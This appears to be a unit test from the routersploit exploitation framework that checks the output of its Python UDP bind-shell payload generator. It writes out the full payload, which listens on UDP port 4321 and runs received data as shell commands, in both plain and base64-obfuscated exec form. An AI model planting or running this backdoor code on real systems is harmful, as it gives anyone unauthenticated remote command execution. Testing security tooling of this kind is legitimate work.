Skip to content

R
routersploit
Switch branch/tag
Find file
BlameHistoryPermalink
test_bind_udp.py 1.17 KB
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 
from routersploit.modules.payloads.python.bind_udp import Payload


# python bind udp payload with rport=4321
bind_udp = (
    "from subprocess import Popen,PIPE\n" +
    "from socket import socket, AF_INET, SOCK_DGRAM\n" +
    "s=socket(AF_INET,SOCK_DGRAM)\n" +
    "s.bind(('0.0.0.0',4321))\n" +
    "while 1:\n"
    "\tdata,addr=s.recvfrom(1024)\n" +
    "\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n" +
    "\ts.sendto(''.join([out[0],out[1]]),addr)\n"
)

# python bind udp payload with rport=4321 encoded with python/base64
bind_udp_encoded = (
    "exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))"
)


def test_payload_generation():
    """ Test scenario - payload generation """

    payload = Payload()
    payload.rport = 4321

    assert payload.generate() == bind_udp
    assert payload.run() == bind_udp_encoded